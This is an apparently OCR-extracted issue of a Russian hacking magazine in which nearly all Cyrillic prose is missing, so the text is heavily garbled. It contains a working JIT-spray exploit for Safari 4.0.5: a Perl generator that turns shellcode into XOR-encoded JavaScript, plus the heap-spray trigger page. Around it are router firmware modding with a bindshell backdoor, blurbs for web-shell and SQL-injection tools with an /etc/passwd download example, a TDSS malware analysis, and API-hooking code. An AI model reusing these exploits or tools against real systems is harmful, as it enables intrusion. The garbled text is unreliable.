appendChild(i);document.body.appendChild(f);
setTimeout(b,10000);'] ![/URL]
X 09 /140/ 10

-,
CSRF

PoC
Internet Explorer (,
, ).
,
.
,
.


FormCalc
help.adobe.com/
en_US/livecycle/es/
FormCalc.pdf
Adobe
Livecycle Designer,
trial
PDF
adobe.
com/go/trylivecycle

CSRF owasp.
org/index.php/CrossSite_Request_Forgery_(CSRF)
(
,
) oxod.ru

,
-. ,
, .

, ,
, .
. ,
ICQ .
< >, .
ICQ ! !
.
. [URL]
jjencode , . , XSS
-.
. WAF
, ,
. ,
, ,
.

DVD
dvd

, ,
.
. .

.
. ,
, , , ,
.
. ( ), . ,
oxod.ru. z

069


Digital Security a.sintsov@dsec.ru

JIT SPRAY !

JIT SPRAY!

JIT SPRAY.
Flash- ActionScript, Safari
JIT- JavaScript. , 6
DEP ASLR Windows 7
.
...

, ? ,
Hack In The
Box JIT SPRAY ( 8
6 ) EGG-HUNTER
( )
JIT , Flash 10.1 , JIT SPRAY .
- ,
, , ...

. Windows 7 ,

070

DEP (
) ASLR ( ) HEAP SPRAY .
, ,
, .
, JIT SPRAY Flash-
, , Adobe JIT . JIT?

JUST-IN-TIME

Just-In-Time ,
, , ,
, , . JIT , JIT- ( :). ,
X 09 /140/ 10

ASLR .
JIT SPRAY .

ActionScript ( Flash-)
. JavaScript Safari Windows.
JavaScript, XOR:
<SCRIPT>
function jit_() {
var y=( 0x11111111^
0x22222222^
0x33333333^
0x44444444^
0x55555555^
0x66666666^
0x77777777^
0x88888888);
return y;
}
</SCRIPT>

81F033333333
894708
8B4708
8B570C
83FAFF
0F8529010000
81F044444444

XOR
MOV
MOV
MOV
CMP
JNZ
XOR

JIT SPRAY

EAX, 33333333
[EDI+8], EAX
EAX, [EDI+8]
EDX, [EDI+C]
EDX, -1
04450573
EAX, 44444444

jit_().
, , ( HEX). , XOR
,
, RWX ( Flash RX).

, 20 . Flash-
. , DEP ASLR?
, .

Safari 4.0.5.
,
X 09 /140/ 10

,
, , .
( ). vtable
. ,
EIP:
var a = parent; //
var buf = make_buf(unescape('%u0101%u0101'), 63000);
a.prompt(alert);
// 0x01010101
a.prompt(buf);
a.close();
//
// promt() = 0x01010101
a.prompt(alert);

Y, JavaScript
XOR, ,
JIT-, , , jit_():
. . .
04450432
04450438
0445043B
0445043E
04450441
04450444
0445044A
. . .

RWX

,
. ,
.
( ) . ,
. DEP
, . - , ASLR,
. JIT-, .
jit_()
, JIT-.
, ? XOR-
, JIT-

0x0000. , 0xXXYY0000 JIT- .
, 0xXXYY , Heap Spray. ASLR?
0xXXYY ? ASLR ,
Safari
jit_() .
.
99% , ,
0x0606000, 0x07070000 .. (. ). JIT-
0x010000,
, , , N 0x06060000, N+1 0x06070000 .. ,
. ,

071

0xXXYY0104 JIT-

XOR .
,
, 0x0104
XOR.
0xXXYY0104, XXYY
, 0x0607 0x0808
.. , ASLR .

, 0x07070104,
10- XOR-. ,
XOR 0x01020304,
0x1a1b1c1d, 0x07070104 :
. . .
07070104 0403
ADD AL, 3
; 10-
07070106 0201
ADD AL, [ECX] ;
-- 12
0707011A 81F01D1C1B1A XOR EAX, 1A1B1C1D ; 11 XOR
. . .

LITTLE-ENDIAN , , 0x0304
-. 0x0201
14EB (EB14 = JMP +0x14), . Flash, ,
,
20 (0x14) ,
. ,
:
..^0x14EB9090^0x14EBCC90^..

:
. . .
07070104
07070105
07070106
-0707011C
0707011D
0707011E

90
NOP
90
NOP
EB14
JMP 0707011C
14
90
NOP
INT3
CC
EB14
JMP

. . .

,
, . , DEP
...

072

RWX c JIT-

JIT-

,
XOR JavaScript.
, .
Flash - ,
. , ,
JIT SPRAY Flash
Safari . Flash R-X ( ), Safari RWX,
.
, , , . : RWX , , JIT- 07070000.
.
MOV
[ECX], EAX (0x8901 -). ECX 0x07080000, EAX
, RWX- (W ).
-
EAX, 0x0708000
, .
JMP ECX (0xFFE1 ) ,
.


. ,
. MOV REG, VALUE 5 .

. MOV AL, 01 (0xB001) MOV
AH, 02 (0xB402), EAX 0x0201,
0xXXYY0201. ? ,
SHL EAX, 1 (0xD1E0). ECX- , ,
,
...
.
. , , ,
, - JIT-,
. , 0x10000 , ,
: N
0x06060000, N+1 0x06080000 (
0x06070000). , JIT SPRAY
. ,
50%. ,
X 09 /140/ 10

JIT-.

Metasploit

. . , ,
. 0x0000ABCD*0x10000=0xABCD0000.
, JIT-, ECX EAX,
ECX EAX. ECX
EAX .

,
:

,
JIT-.
! Perl.
, .
, -, JIT- .
-, . ,
Perl, $shellcode.
, .
0x080A0000. ,
:
#Address with RWX - place for shellcode
$addr="\x08\x0A"; #0x080A0000

, ,
4. 1, 2 3, :
$len=length($shellcode);
$add=$len % 4;
for($i=0;$i<$add;$i++)
{
$shellcode.="\xCC";
}

, ; , , 0xXXYY0104 , ,
JIT- .
:
$offsetJit="\"0x22222222^\"+/* START OF OFFSET */\n".
-------- 7 ----------"\"0x22222222^\"+ /*SHELLCODE BEGINS*/\n";

$initJit="\"0x14EBC031^\"+//XOR EAX,EAX\n".
"\"0x14EB01B4^\"+\n".
"\"0x14EB00B0^\"+\n".
"\"0x14EBE0F7^\"+// EAX=0x100*0x100\n".
"\"0x14EBF08B^\"+// MOV ESI, EAX ;ESI=00010000 - MUL factor\n".

, . , XOR 0x14EBC031
. EIP 0x07070104, 0x31C0EB14.
0x310 XOR EAX, EAX. ,
0xEB14 JMP +14
0x14EB01B4. , MOV AH, 01 / JMP
14. , AH ,
, AL. ,
EAX=00000100. MUL EAX,
0x100 0x100 EAX 0x00010000.
,
EAX ESI. ESI .
, ECX ,
. $addr.
sprintf("\"0x14EB%02lxB4^\"+\n",ord
substr($addr,0,1)).
sprintf("\"0x14EB%02lxB0^\"+\n",ord
substr($addr,1,1)).

,
$addr AH AL. , EAX =
0001080A. , .
EAX ECX:
"\"0x14EBE6F7^\"+ // MUL ESI; EAX - RWX memory for shellcode\n".
"\"0x14EBC88B^\"+ // mov ecx, eax ; ECX - pointer on RWE mem\n".

, 0xEB14 ,
. ECX 080A0000,
EBX :
"\"0x14EBDB33^\"+ // xor ebx, ebx\n".

, XOR JavaScript, +,
JavaScript. eval() ,
JavaScript , .
. ESI 0x10000
X 09 /140/ 10

"\"0x14EB04B3^\"+ // mov bl, 4

; EBX = 0x4 - step \n";

. ECX ,
, ESI , EBX
. .
.

073

HTML JavaScript,

#Convert shellcode into JIT code


for($i=0; $i<length($shellcode); $i+=4)
{
my $val="";
$byte1=substr($shellcode,($i+3),1);
$byte2=substr($shellcode,($i+2),1);
$byte3=substr($shellcode,($i+1),1);
$byte4=substr($shellcode,($i),1);

, $byteX.
EAX:
$val.="\"0x14EBC031^\"+ //XOR EAX,EAX\n";

$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte1);


$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte2);
$val.= "\"0x14EBE6F7^\"+ //MUL ESI\n";

$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte3);


$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte4);

EAX, $byte1 AH, $byte2 AL.


MUL ESI, , EAX=EAX*ESI. ESI
, , $byte1 $byte2

074

EAX.
EAX ( AH AL) $byte3 $byte4.
EAX . :
$val.="\"0x14EB0189^\"+ // mov [ecx], eax ;\n.
"\"0x14EBCB03^\"+ // add ecx, ebx\n;
$copyJit.=$val;

ECX (0x080A0000)
. ECX EBX, .
, 4 ,
EAX , ECX ,
. ( $copyJit) 0x080A0000 (
$addr). :
$jumJit="\"0x14EB00B5^\"+ // mov ch, 00\n".
"\"0x14EB00B1^\"+ // mov cl, 00 ;\n".
"\"0x14EBE1FF^\"+ // JMP ECX ; PROFIT! \n";

ECX (CH CL), ECX


0x080A0000, JMP ECX,
X 08 /139/ 10

VUPEN $$$.
ECX, , ,
. , $page HTML-
:
$page="
<script>
function make_buf(payload, len) {
while(payload.length < (len * 4))
payload += payload;
payload = payload.substring(0, len);
return payload;
}
function fff()
{
var a = parent;
var buf = make_buf(unescape('%u0104%u0707'),
68000);
a.prompt(alert);
a.prompt(buf);
a.close();
a.prompt(alert);
}

JavaScript- :
var SPRAY=\"\";
var JIT=\"{ \"+
\"var y=(\";

, .
, SPRAY JIT. JIT
Y.
$page JIT-: $offsetJi
t.$initJit.$copyJit.$jumJit.
Y JavaScript JIT-,
Perl. ,
$endPage:
$endPage="\"0x14ebcccc\"+
\");\"+
\"return y; }\";
X 09 /140/ 10

return y;,
. , ASLR,
:
var zl=\"zlo_\";
for (var i=1;i<800;i++)
{
SPRAY+=\"function \"+zl+i+\"()\"+JIT+\"
\"+zl+i+\"();\";
}

JavaScript SPRAY 800


zlo_X() . X
. ,
... ,
eval():
eval(SPRAY);
fff();
</script>

eval(),
, fff()
, EIP 0x007070104, ,
0x080A0000
. JIT SPRAY
6 10 .

, JIT-
. ,
, ,
.


JIT SPRAY.
,
. , VUPEN
JIT SPRAY Safari 0day-
. ,
JIT- Safari Mac OS
iPhone/iPad, , ,
, . z

075


HellMilitia my Death

Broadcom



DLINK 2500U

.
,
, D-Link 2500U. , ,
Wake-up bindshell'a
, Broadcom.
, ,
500T , ,
.
, nmap:
$ nmap -A 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.026s latency).
Not shown: 998 closed ports
PORT
STATE SERVICE

076

23/tcp open
80/tcp open

telnet
http

, telnet ssh, ...


, . UDP-,
, - :
# nmap -sU 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.00096s latency).
Not shown: 997 closed ports
X 09 /140/ 10


PORT
STATE
SERVICE
53/udp open
domain
67/udp open|filtered dhcps
69/udp open|filtered tftp
MAC Address: 00:26:5A:74:70:79 (D-Link)

tftp; , , , .

:
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
BCM96332 ADSL Router
Login: admin
Password: admin

BusyBox,
. ,
BCM Broadcom!
(), .
shell ... , , ,
, , , . cd, ls dir
, . , help`e
echo /,
, , (//
) , .
ls , cd?
sh, ... ! BusyBox, , help,
cd! ,
2 shell'... , , ,
- .
:
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs

, linuxrc ( ,
BusyBox) webs ( ,
-). GNU\Linux:
# cat /proc/version
Linux version 2.6.8.1 (jenny@BS5) (gcc version 3.4.2)
#1 Wed Mar 4 21:10:17 CST 2009

. ,
2.6, ,
( 2.6 , 2.4,
, - ). :
# cat /etc/versions
MODEL=DSL-2500U
X 09 /140/ 10

VERSION=RU_1.50
BCM_VERSION=3.10L.01.
Revision=5317
FSSTAMP=20090304211235


, -
, , ,
. FTP-
2500U,
.
:
# cat /proc/cpuinfo
system type
processor
cpu model
BogoMIPS
wait instruction
microsecond timers
tlb_entries
extra interrupt vector
hardware watchpoint
unaligned access
VCED exceptions
VCEI exceptions

:
:
:
:
:
:
:
:
:

96332
0
BCM6338 V1.0
239.20
no
yes
32
yes
no
: 8407352
: not available
: not available

, Broadcom 96338. : Netgear, Asus ..,


(,
-
shell'e, , shell ),
. 280D MIPS,
200MHz (, ). :
# cat /proc/mounts
rootfs / rootfs rw 0 0
/dev/root / squashfs ro 0 0
/proc /proc proc rw,nodiratime 0 0
tmpfs /var tmpfs rw 0 0
# cat /proc/mtd
dev:
size
erasesize name
mtd0: 00153000 00001000 "Physically mapped flash"
# cat /proc/meminfo
MemTotal:
6108 kB
MemFree:
428 kB
---8<---

SquashFs
LZMA, ,
. Flash-
, , - 2 . 6 , .
.
, CFM (Common Firmware Manager), , . Telnet

077

: bcmtag(256) +
CFE(62380) = 62636,
(62636) + (1474560).
$ hexdump -C -n 64 -s 62636 firmware.img

SquashFs sqsh, , .

dd:
$ dd if=firmware.img of=fs.img bs=1 skip=62636
count=1474560

, ,
. :
pvc2684d , ADSL, PVC (Permanent Virtual Circuit).
sntp .
snmpd ,
SNMP (Simple Network Management Protocol).
syslogd ,
. , , : ,
.


, /dev/ac97 (AC97
)...

. , : ?. , 500T:
wget, ...
nmap' tftp-
. tftp,
:
$ tftp
tftp> connect 192.168.1.1
tftp> mode binary
tftp> put firmware.img

,
:
, , , , .
, .
, .
bcmTag.h . , , , ,
GNU/Linux
SquashFs. 265 ,
, ,
.
$ hexdump -C -n 256 firmware.img

078

, - man dd. .
,
LZMA.
$ mkdir unpacked_fs
$ usquashfs fs.img

, ,
, , telnet ssh (
), BusyBox... :
$ mksquashfs unpacked_fs modifed_fs.img -noappend

.

. , :
$ dd if=firmware.img of=before.img bs=1 count=62636
$ dd if=firmware.img of=after.img bs=1 skip=1537196

(62636) + (1474560).
:
$ mv before.img modifed_firmware.img
$ dd if=modifed_fs.img of=modifed_firmware.img bs=1
seek=62636
$ dd if=after.img of=modifed_firmware.img bs=1
seek=1474560

, : totalImageLen, rootfsLen, kernelAddress,


imageValidationToken ( dword) tagValidationToken. .
totalImageLen: du -b modifed_firmware.img.
rootfsLen imageValidationToken: cksum -b modifed_fs.img
kernelAddress: oldKernelAddress + (modified_rootfsLen old_rootfsLen).
, , tagValidationToken:
$ dd if=modifed_firmware.img of=modified_tag.img bs=1
count=256
$ cksum tag.img
, - ! , ,
, . ,
. , ,
, .
FTP-, .
X 09 /140/ 10

.

. toolchain' (*uclibc_crosstools*),
, GNU/Linux.
, :
$ mkdir dlink_firmware
$ tar xvfz *consumer.tar.gz -C dlink_firmware

consumer_install :
$ cd bcm_963xx_router
$ make PROFILE=96332CG

PROFILE ,
. Compile.
pdf FTP .
. ,
,
. ! ,
, ,
. , .
, - :

$ wget http://admin:admin@192.168.1.1/
backupsettings.conf

TFTP- :
# tftp -g -f backupsettings.conf -t c 192.168.1.2

TFTP-,
backupsettings.conf. , , :).

, ,
. , 500,
. CFE (Common
Firmware Environment), Reset ,
20 , . , HTTP ,
. (
), ,
, JTAG-. ,
(,
), .

. ,
AV-, .
X 09 /140/ 10

! AV , , , .
, .
,
, , .
endian, :
MIPS-, , ,
(big endian, little endian). ,
, GNU\Linux. : .
: , , export (
, /etc/init.d/rcS), fork()
, . ,
, , export
( ), , export. ,
, bindshell.

. Wakeup-bindshell,
. , ,
: , ICMP ( , IP),
(icmp.icmp_id) 0xDEAD ( ,
). , bindshell , , ,
, . : ,
ICMP-,
bindshell ICMP-
icmp.icmp.id 0xDEAD. (31337, ).
wakeup DVD.
,
. , LKM,
-, ... ,
.

,
, (
: ?,
), . ,
iptables ( ). ,
, . , iptables ,
(ssh) IP-
! , ,
, .
, ,
. ,
; ,

. ,
( ).
, ,
( , ), , , , ,
.

,
, , ,
.
,
! z

079


icq 884888

X-TOOLS

: GetEngine
:*nix/win
: elwaux

-
.
:

, ,
rdot.org/forum
.


,
.

base.getEngine, 70 .

:
./ge.pl site.com #
./ge.pl site.com -debug #

./ge.pl -update #

:
./ge.pl rdot.org/forum/
GetEngine v0.1
eLwaux(c)2009
Found Engine: vBulletin
version 3.8.5 (clientscript/
vbulletin_global.js)


https://rdot.org/forum/showthread.
php?t=146.

: [S]Hell Wizard 4.3


: *nix/win
: Dr.Z3r0

rDot [S]
Hell Wizard.

080


-
.


MySQL- ,

.
,
-,
DDoS-,
(
set_time_limit, ignore_user_abort
) PHP,
.

.

( )
:
http://www.site.com/path/shell.php
http://www.site2.com/path/shell.
php
http://www.site3.com/path/shell.
php?basic_user=[user]&basic_
pass=[pass] # BasicAuth

,

, ,
:
PR ;
( :
r57, c99 );
(, -);
PHP (safemode, open_
base_dir, set_time_limit, ignore_
user_abort,
socket);

;
.

;

-;
BasicAuth ;
PR ;

;
;
Reverse ip ,
;
HTML-
;
DDoS;

(r57, c99 );
(SQL- ).



https://rdot.org/forum/showthread.
php?t=136.

: SQLmap
: *nix/win
: inquis, stamparm


SQLmap

SQL-.
:
*nix- Windows;
MySQL, MS SQL,
PostgerSQL, Oracle;

SQL-:
, blind UNION ( time based
);
;

(MySQL
PostgreSQL user-defined , Microsoft SQL Server
xp_cmdshell());
X 09 /140/ 10

blind SQL-

SQLmap
,
;
HTTP Basic, Digest, NTLM
Certificate ;
(, ,
);
,
;
, ,
;
;
SQL-;

(
);

;
Metasploit
w3af;
;

, ;
;
;
GET
POST;

CHAR() ( magic_quotes);

.

, , http://test.com/test.php?id=1.
SQLmap :
sqlmap -u "http://test.com/test.
php?id=1" -b -v 1

:
sqlmap/0.8 - automatic SQL injection
and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 04:53:42
...
web application technology: Apache
2.0.63, PHP 5.2.5
back-end DBMS operating system: None
back-end DBMS: MySQL 5
X 09 /140/ 10

!
[04:53:43] [INFO] fetching banner
[04:53:43] [INFO] the back-end DBMS
operating system is None
banner: '5.0.90-community'
[04:53:43] [INFO] Fetched data
logged to text files under '/src/
sqlmap/output/blindcanadians.
ca'[*] shutting down at: 04:53:43


:
: Apache 2.0.63
: PHP 5.2.5
: MySQL 5
(5.0.90-community)


sqlmap.
sourceforge.net.

: DirBuster
: *nix/win
: James Fisher, John Anderson,
Subere, Richard Dean

OWASP .
Java- DirBuster,

. :

( 6000 );
HTTPS HTTP;
,
;

;
,
;
,
;
;
HTTP-;
;
- HEAD-
GET-;
HTML-;

;
Basic, Digest NTLM ;
GUI ;

, Java.





.
owasp.
org/index.php/Category:OWASP_DirBuster_
Project.

: Blind SQL Injection


Dumper v1.1
: *nix/win
: Shadow


- Blind SQL Injection
Shadow,
Qwazar' (https://forum.antichat.ru/showpost.
php?p=1494443&postcount=11).
:
BlindSQLiDumper.exe [full path whith
vuln param] -[q,f [param]] [file
out(default result.txt)]

:
q ["sql query to unlimit repeat"]
, , LIMIT
( SQL- -
, LIMIT,
);
f ["full path to filename for download"]
( Qwazar'
64 ),
, ,
.
:
BlindSQLiDumper.exe test.com /
forum/index.php?id=-123' -q "select
table_name from information_schema.
tables" tables.txt

:
BlindSQLiDumper.exe test.com /
forum/index.php?id=-123' -f /etc/
passwd passwd


, , https://rdot.org/
forum/showthread.php?t=143. z

081

MALWARE
,

TDSS


:

TDSS. , TDSS
, ,

.
TDSS . - . , ,
,
.
east.*****.
pu.ru. (. ).

O
HTML-

- Small Http Server,


, , WireShark
.
MalZilla.

.
Trojan-Downloader.JS.Pegel.g, -,
JavaScript.
<iframe src = , ,
-. ,
WireShark Content-Length 2.

Trojan-Downloader.JS.Pegel.g

( )
Exploit.Script.Generic.
JavaScript, . , , , , %, unescape
document.write.

Virus.Win32.Sality.ag.
MS06-014
.

n

, HTML-. ,
.

082

X 09 /140/ 10

Exploit.Script.Generic
,
PHP-,
, PHP- . base64,
POST, , .

Twitter.
JSON- :

Exploit.JS.Pdfka.bwb, JavaScript-
.
.
, ,
.
,
.

<script src='http://search.twitter.com/trends/
daily.json?callback=callback'>
, ,
callback=. ,
callback,
.

daily.json, twitter.com

,
302 Moved Temporarily, location
121.101.***.203. , . ,
PE-, Packed.Win32.Krap.x. ,
Windows,
.
PDF-,
Adobe Reader, Java-,
MS06-014.

Packed.Win32.Krap.x,
, , TDSS.

IDA. Hiew
.
FakeApi ,
. .
ROL SHR.

Trojan-Downloader.JS.Timul,
Windows
PDF, Krap.x. - , , Hiew, JavaScript .
Adobe Reader,
. ,
Krap.x.
XOR 0x99.

X 09 /140/ 10

Packed.Win32.Krap.x,

083

MALWARE

, Trojan.Win32.TDSS
, .
, , .
Packed.Win32.
Krap.x, . ,
TDSS
.


Hiew. ~0x1000, (~0x60000 )
. , , (VirtualProtect, GetTempPathA, GetModuleHandle
Kernel32.dll), ,
GetDlgCtrlId, GetParent user32.dll.
.

: H, ., f.
LEA, CS,
.
, , , LEA AX, CS:[EAX + 0]; LEA AX, [EAX + 0];
LEA AX, [EAX] .

Trojan.Win32.Tdss
.
GetDlgCtrlID GetParent FS: .
LastErrorValue
Windows TEB. .
SpareBool PEB.
.

. RC4.
0x0 0x100 SpareBool, . PETools , .
, MSVC
, .
, , TDSS . , , ,
. .


Trojan.Win32.Tdss,
, ,
NOP. , ~25%
. ,
, , ,
inc reg add reg, 4.

,
JMP .



FakeApi
084

. ,
.
,

( ):

Malwarebytes' Anti-Malware_is1; NOD32; Agnitum Outpost


Security Suite Pro_is1; Avira AntiVir Desktop; avast!; AntiVir
PersonalEdition Classic; Sophos; Sophos Client Firewall; Sophos
Antivirus; Kaspersky 2010; Kaspersky 2008; F-Secure Web Filter.

:
.
( ,
), , .
, TDSS
,
. ,
, TDSS,
..z
X 09 /140/ 10

MALWARE
stannic.man@gmail.com

HookFAQ:
hard version



?
? ,
, , (
,
. )!
RTFM

(hook , .)? ,
.
Microsoft

,
.
: SetWindowsHook(Ex),
UnhookWindowsHook(Ex) CallNextHook(Ex).

, .
,
,
. ,
,
.

086

.
Windows -,
,
, (,
).
.

, Windows , ,
,
,
.

,
.
, , . exe-,
. -

,
,

.
-,

- ,



.
, , /
,
.
,



X 09 /140/ 10

rku

. ,

,
, ,
, , ..
SetWindowsHook? .
, .
.


-. ,
, ,
. GetProcAddress :
GetProcAddress(GetModuleHandle("ntdll.dll"),
"CsrNewThread").

, ,
, ntdll.dll, kernel32.dll (kernelbase.dll Windows7)
advapi32.dll.
-, --
:
int MyNewFunction(void *param1,
int param2, bool param3)
{
return OriginalFunction(param1,
param2, param3);
}


OriginalFunction , MyNewFunction.
, -
OriginalFunction, - MyNewFunction,
.
, , 8 10.
,
. ? ,
, , ,
, .
. , :
?
.
,
, ,
.
, . ,
- , , -,
, -, .
X 09 /140/ 10

IAT -
:).
. , .
, jmp
.
jmp, .
,

.
:
, , . ,
,
. , , -, ,
, -
.
, ,
,
.
, .

IAT, EAT

: , ,
? , ,
Import Address Table (IAT).
, . DLL,
, , IMAGE_IMPORT_DESCRIPTOR.
DLL, ,
IMAGE_IMPORT_BY_
NAME. IMAGE_IMPORT_BY_NAME
, .

, IMAGE_IMPORT_DESCRIPTOR
DLL .
DLL (mapped),

IMAGE_IMPORT_BY_
NAME .
hook- , PE

DVD
dvd


,
, ,

.

HTTP://WWW
links
http://vx.netlux.org

,

.
Must visit,
.

087

MALWARE

,
.
int SetDebugBreak(FARPROC address)
{
int status = -1;
HANDLE thSnap = CreateToolhelp32Snapshot(
TH32CS_SNAPTHREAD, NULL);
THREADENTRY32 te;
te.dwSize = sizeof(THREADENTRY32);
Thread32First(thSnap, &te);
do
{
if(te.th32OwnerProcessID != GetCurrentProcessId())
continue;

IAT -
HANDLE hThread = OpenThread(
THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);

IAT
hook-. ,
, hook-
. , , ...
Export Address Table (EAT), , , Dll,
.

CONTEXT ctx;
ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
GetThreadContext(hThread, &ctx);
if(!ctx.Dr 0)
{
ctx.Dr0 = MakePtr( ULONG,
ctx.Dr7 |= 0x00000001;
status = 0;
}
else if(!ctx.Dr1)
{
ctx.Dr1 = MakePtr( ULONG,
ctx.Dr7 |= 0x00000004;
status = 1;
}
else if(!ctx.Dr2)
{
ctx.Dr2 = MakePtr( ULONG,
ctx.Dr7 |= 0x00000010;
status = 2;
}
else if(!ctx.Dr3)
{
ctx.Dr3 = MakePtr( ULONG,
ctx.Dr7 |= 0x00000040;
status = 3;
}
else
status = -1;

STELTH-: ,

,
,
. ? , .
. , , . ,
, - . . , , ,
,
, . , ,
, . GetThreadContext/
SetThreadContext. -
(Breakpoints) .
, :
DR0 - DR3
. ,
;
DR4 - DR5 i486 ;
DR6 . , ( 1).
, ;
DR7 , .
, ,
(hardware breakpoint, int 1) ,
(single step
exception) , :

address, 0);

address, 0);

address, 0);

address, 0);

ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
SetThreadContext(hThread, &ctx);
CloseHandle(hThread);
}
while(Thread32Next(thSnap, &te));
return status;
}

AddVectoredExceptionHandler(0, (PVECTORED_EXCEPTION_
HANDLER)DebugHookHandler),
EXCEPTION_SINGLE_STEP.

. ,

088

, . , .
! z
X 09 /140/ 10


Mifrill mifrill@real.xakep.ru

,
,
? ,
!

, ,

. ,
,
.

, ,
,
,
.
,
,
.
,
, ,
. ,
,
.
, , -
-
. , ,

,
.
, ,
.
,


. ,

090
074

,
. ,

.
-

FORWARD DEFENSE,
.
,
.
,


.
, , ,
.
, , ,
.
,
.

.
,
,

,
,

. , , ,
,
.
( )

,

(
). ,

Cyber Defense Exercise,
10- .

CYBER DEFENSE EXERCISE

Cyber Defense
Exercise (CDX)


. CDX
IT-. , ,
,
.
,
,
,
, - (United
States Naval Academy),
.
, ,
-
. , ,
, .
M.: , , ,
?
, -?
..: ,

(
. ,

X 09 /140/ 10


.
Red Team , - .
, .

, :
White Cell , .
Blue Cell(s) () .
Red Cell .
Gray Cells -.

.

.
. Mifrill). !
, , , 10- .
. ,
. ,

.
.: 10- ?
..: 10th Fleet... , United States Fleet Cyber Command.
- , Navy .
, ,
, :).
X 09 /140/ 10

- ,
. C 10-
.
.: ,
, Cyber Defense
Exercise
,
?
..: ? , ? , . .
().
.: , ,
. , ?
..: CDX .

,
hostile
environment ( ).
,
.

. ,
Gray Cell .
, ,
.

50 000 , ,
- , -
. , e-mail
, .
, ,
,
. ,
, .
.: , ?
..: , :
US Military Academy (West Point), US Naval
Academy, US Airforce Academy, US Coast
Guard Academy, Royal Military College of
Canada, US Airforce Institute of Technology

091

, . CDX

.
:)
(2 ), Naval Postgraduate School, US
Merchant Marine Academy.
IT-, .
,
, .

. , Coast Guard

.
, ,
,
. , , 38
, ,
9.
.:
, ,
?
..: ,
, CDX
, ,
,
:). ,
VoIP- US Coast
Guard Academy. , ,
, ,
-
, .
(

092

, , ,
). ,
West Point

,
,
CDX
. ,
, ,
West Point Coast
Guard, ,
. ,
.
.: , ?
..: ,
, , (
), .
- .
-
,
.

,
.
,
.
:
- +
.

: IP-,
,

AIM-, .
,
, .
VoIP- VoIP- , , .
.
.
, ,
. , ,
, .
.: ?
..: ,
5000 . .
.
, VPN .

.
, , , ,
,
, ,
:).
,
, , ,
.
,
. ,
.
, VPN,
. ,

VMWare,
.
,
: (node) 200 . 100 ,
100 , 50
, 100
.
, . , .
.: ? ,
- ?
..: .
, open source. - ,
IT-, . ,
X 09 /140/ 10

. , ,
.
, .
, ,
.
, 200 .
, CentOS. 100 . IP tables 100
. WireShark 100 . -
100 .
,
, ,
.
,
,
.
,
, ,
.
.: ?

..: , . VPN,
, ,
...

, .
:
Red Time 08.00-16.00, ,
Gray Cell, .
White Time 06.00-08.00, 16.00-22.00,

, ,
.
,
Downtime (),
. , ,
, .
, 16.00.

US
Airforce Institute of Technology,
IT-, 1 16

.

..: , !
,
, ,
RAdmin .
, RAdmin -,
, .
.
.:
, ?
,
- ?
..: . -
, .
plausible deniability... ,
- , ,
,
, , ,
!.
:).
, , , , .
Rainbow Tables ?
.
. Metasploit? ,
.
BackTrack...
.
.: , , , . ,
Cyber Defense
Exercise.
X 09 /140/ 10

Black Time 22.00-06.00,


, .

, ,

,
.
(
),
. ,
,
, . .


.
.: ,
?
..: , .
DoS.
,
.
,
.
.: (Grey
cell),
, ,
?
..: , . ,
! Gray cell
, .


, .
, .
,
,
,
.

,
. , e-mail,
, ,
, .pdf
- ,
.
,
. , ,
, ,
, ,
. , ,
, .
-
,
.
.: , ? ?
..: , . Red
Team. :).
( :
Red cell 40
.
Red Team,

, , ,
,


.)
.
, ,
. - . .
,
, , ,
VoIP. ,
, 10
,
.
, -
.
,
.
- ,
Gray cell ,
-
. , ... ,

IP,
- .

093


! ,
. ,
, . : 16 ,
. ,


, ,

. , -

,
.
.: , ?
:)
..: .
US Airforce Institute of Technology,

IT-, 1
16. ,

( ). : ,
,
, .
. , ,
,
, , ,

094

IT- - . -
, .

, ,
... .
Airforce Institute of Technology
,
, ,
BackTrack .
.: ,
, ,
?
-
, for
lulz?
..: . ,


, .
.
, , ,
. , ,
,
- .
5 ,
,
, .
,
. , , Washington
post. z
X 09 /140/ 10

UNIXOID
dhsilabs@mail.ru

-Bus

D-Bus

D-Bus,
Linux-
.
D-Bus,
.
D-BUS
, ,
, D-Bus, . ,
. .
,
D-Bus,
.
D-Bus ,
,

. ,
D-Bus /
Network Manager';
IM- ,

096

;
;
scale;
USB- (
, HAL + D-Bus + pmount) ..
, D-Bus
(KDE, GNOME, Xfce), .
D-Bus
. ,
.
,
D-Bus,

. , ,
, ,

.

.
,
, .

, D-Bus , ,
, .

.
,
Glib, Qt Java.
D-Bus .
.

X 09 /140/ 10

, , 30 ?
:

qdbus org.kde.yakuake
, ,
.
.
.

.
D-Bus
, D-Bus .

.
D-Bus . , , org/kde/
kspread/sheets/1/cells/1/1. -
. , 1:1
KSpread. , , /com/appl1/c5444sf956a.
.
, .

D-BUS
, D-Bus
.
:
$ qdbus org.kde.krunner /ScreenSaver Lock

, . . , KDE
, D-Bus,
:
$ qdbus org.kde.krunner /ScreenSaver \
SimulateUserActivity

, X-
. , :
$ xset dpms 0 0 0

0
, 0
, .
, xset xorg.conf,
, ,
- xset.
SimulateUserActivity. ,
, .
.
X 09 /140/ 10

#!/bin/bash
$* &
while jobs | grep -q Running
do
qdbus org.kde.krunner /ScreenSaver \
SimulateUserActivity
sleep 30
done

. ,
,
.
/usr/bin/simulate.
:
$ sudo chmod +x /usr/bin/simulate
$ simulate mplayer film.avi

, MPlayer '-stopxscreensaver',
.


Windows
FlashGet. ,
. ,
, .

Linux D-Bus.
:
$ qdbus org.kde.klipper /klipper \
getClipboardContents

, , URL (
http://):
#!/bin/bash
while true
do
if qdbus org.kde.klipper /klipper
getClipboardContents | egrep -q '^(http://)'
then
qdbus org.kde.klipper /klipper
getClipboardContents
fi
sleep 1
done

. (
<Ctrl+C>, ),
.
URL (, http://),
,
. , :

INFO

info
D-Bus



GLib, GCJ (Java),
Mono, Qt Python.
KDE4
D-Bus.

,
,

.


,

